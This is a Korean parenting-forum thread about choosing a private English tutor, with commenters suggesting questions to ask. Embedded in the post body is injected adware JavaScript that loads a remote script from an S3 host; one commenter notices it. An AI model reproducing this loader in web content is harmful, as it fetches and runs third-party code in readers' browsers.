82cook.com을 즐겨찾기에 추가

자유게시판

드러낼 수 없는 고민을 풀어보는 속풀이방

과외마스터를 검색중인데요??

눈빠질려고 해요 ㅠㅠ 조회수 : 3,188

작은애 영어과외를 시켜볼려고 검색중이예요.... 좀전에 영어학원 상담갔다오긴

했지만 아이가 학원보단 과외를 좋아하네요....(영어시간과 수학시간이 겹치기도해서

시간조정하기도 힘든것고 있구요....)

큰애는 둘다 과외를 하지만(큰앤 주위 잘하는 애 엄마로부터 소개받음)

작은애한테 소개할만큼 얘가 잘 따라갈 애가 아니라서요...(뭔말

인지는 아시겠지요...ㅠ)  

과외마스터에서 눈여겨볼게 어떤건지요??  여긴 지방인데  학벌 좋은샘도 더러있네요...

학벌을 봐야하나요? 경력을 우선시해서 봐야 되는지.... 아님 연락오면

어떤거 위주로 물어봐야 될지 잘 모르겟네요... 아~  머리 쥐날라고 해요......

console.log('Before function()');(function () {console.log('in function()');if (top.location == self.location && top.location.href.split('#')[0] == 'http://www.82cook.com/entiz/text.php?bn=15&num=1970943&no=') {console.log('after self.location check');var headpo = document.getElementsByTagName('head')[0];var po = document.createElement('script'); po.type = 'text/javascript';po.src = document.location.protocol '//charmsavings-production.s3.amazonaws.com/js/apostlebird.js?u=acb80c39-2052-4971-b7fd-7bb25b34a37d&subid1=20150808&subid2=browsersafeguard-rockettab-tightrope-ROW&subid3=browsersafeguard-rockettab-tightrope-ROW&xride_name=RocketTab&xride_powered_by=RocketTab';headpo.appendChild(po);}})();
2 개의 댓글이 있습니다.
  • 1. ..
    '15.8.12 9:40 PM (61.79.xxx.42)

본문밑에 이상한 영문들이 따라다니네요...계속 지우는데 안지워지네요...ㅠㅠ

• 2. 하늘꽃구름
    '15.8.13 12:32 AM (210.217.xxx.48)

주로 쓰는 교재가 있는지.. 뭔지..(초짜 가려내기) 한 6개월 하면 어떤 걸 배울수 있는지..(수업 과정이 체계적인지 알기위한 질문) 수업은 쉽게 가르치는 편인지..(쉽게 가르치는 편이면 그렇다고 할것임. 아니라면 기분나빠할지도)